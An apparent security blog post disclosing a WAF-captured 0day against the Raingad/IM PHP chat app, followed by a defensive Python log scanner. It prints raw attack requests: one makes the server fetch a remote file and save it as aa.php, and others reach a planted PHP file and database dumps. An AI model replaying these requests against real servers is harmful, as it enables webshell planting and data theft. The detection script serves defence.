Raingad/IM instant messaging (PHP) 0day captured by WAF - 李白你好

Work through it yourselves. Below are the request payloads, step by step.

Payload 1

GET /static/pdfjs/web/cmaps/map.php?token=a8d3d543d5b7ac121797f021033830c3&type=postfc&id=https://mysakichj0.oss-ap-southeast-1.aliyuncs.com/script/aa.jpg&dir=aa.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: application/json, text/plain, */*
Connection: keep-alive
Sec-Ch-Ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
Accept-Language: rw
Sec-Ch-Ua-Mobile: ?0
Client: app
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty

Payload 2

 

Payload 3

GET /static/pdfjs/web/cmaps/bb.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: application/json, text/plain, */*
Connection: keep-alive
Sec-Ch-Ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
Accept-Language: rw
Sec-Ch-Ua-Mobile: ?0
Client: app
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty

Payload 4

GET /static/pdfjs/web/cmaps/liaotianmysqldb.sql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: application/json, text/plain, */*
Connection: keep-alive
Sec-Ch-Ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
Accept-Language: rw
Sec-Ch-Ua-Mobile: ?0
Client: app
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty

Payload 5

GET /static/pdfjs/web/cmaps/liaotianmysqldb.txt HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: application/json, text/plain, */*
Connection: keep-alive
Sec-Ch-Ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
Accept-Language: rw
Sec-Ch-Ua-Mobile: ?0
Client: app
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty

Attacker IP:

220.246.128.181
Hong Kong
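
Every captured request targets /static/pdfjs/web/cmaps/, a directory where pdf.js ships only *.bcmap files and a LICENSE. The following is an added example, not part of the original post: a log check that flags script files and other unexpected files under that tree, plus query strings that pair a remote URL with a .php file name. The log lines, client IPs, status codes, the example.invalid host and the rule names are constructed assumptions.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumptions for this sketch: the static root and what each tree may serve.
STATIC_ROOT = "/static/"
CMAPS_DIR = "/static/pdfjs/web/cmaps/"
CMAPS_ALLOWED = {".bcmap", ""}   # pdf.js ships *.bcmap plus an extensionless LICENSE
SCRIPT_EXT = {".php", ".phtml", ".phar"}
# Combined log format: client IP ... "METHOD target HTTP/x" status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(target):
    """Return the names of the rules a request target trips."""
    parts = urlsplit(target)
    path = posixpath.normpath(unquote(parts.path))
    ext = posixpath.splitext(path)[1].lower()
    hits = []
    if path.startswith(STATIC_ROOT) and ext in SCRIPT_EXT:
        hits.append("script-under-static")
    if path.startswith(CMAPS_DIR) and ext not in CMAPS_ALLOWED:
        hits.append("unexpected-file-in-cmaps")
    values = [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    has_url = any(re.match(r"https?://", v, re.I) for v in values)
    names_script = any(posixpath.splitext(v)[1].lower() in SCRIPT_EXT
                       for v in values if "://" not in v)
    if has_url and names_script:
        hits.append("remote-url-plus-script-name")
    return hits

def scan(lines):
    """Map client IP -> [(target, status, rules)] for every flagged request."""
    findings = {}
    for line in lines:
        m = LINE_RE.match(line)
        rules = classify(m.group(3)) if m else []
        if rules:
            findings.setdefault(m.group(1), []).append(
                (m.group(3), int(m.group(4)), rules))
    return findings

# Constructed sample log; paths follow the captured requests above.
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /static/pdfjs/web/cmaps/map.php?token=x&type=postfc&id=https://files.example.invalid/aa.jpg&dir=aa.php HTTP/1.1" 200 12',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /static/pdfjs/web/cmaps/bb.php HTTP/1.1" 200 5',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /static/pdfjs/web/cmaps/liaotianmysqldb.sql HTTP/1.1" 200 9000',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /static/pdfjs/web/cmaps/UniGB-UCS2-H.bcmap HTTP/1.1" 200 4000',
]
if __name__ == "__main__":
    print(scan(SAMPLE))
```

A 200 status on any flagged path means the file exists on disk, so check the directory contents and file timestamps as well as the log.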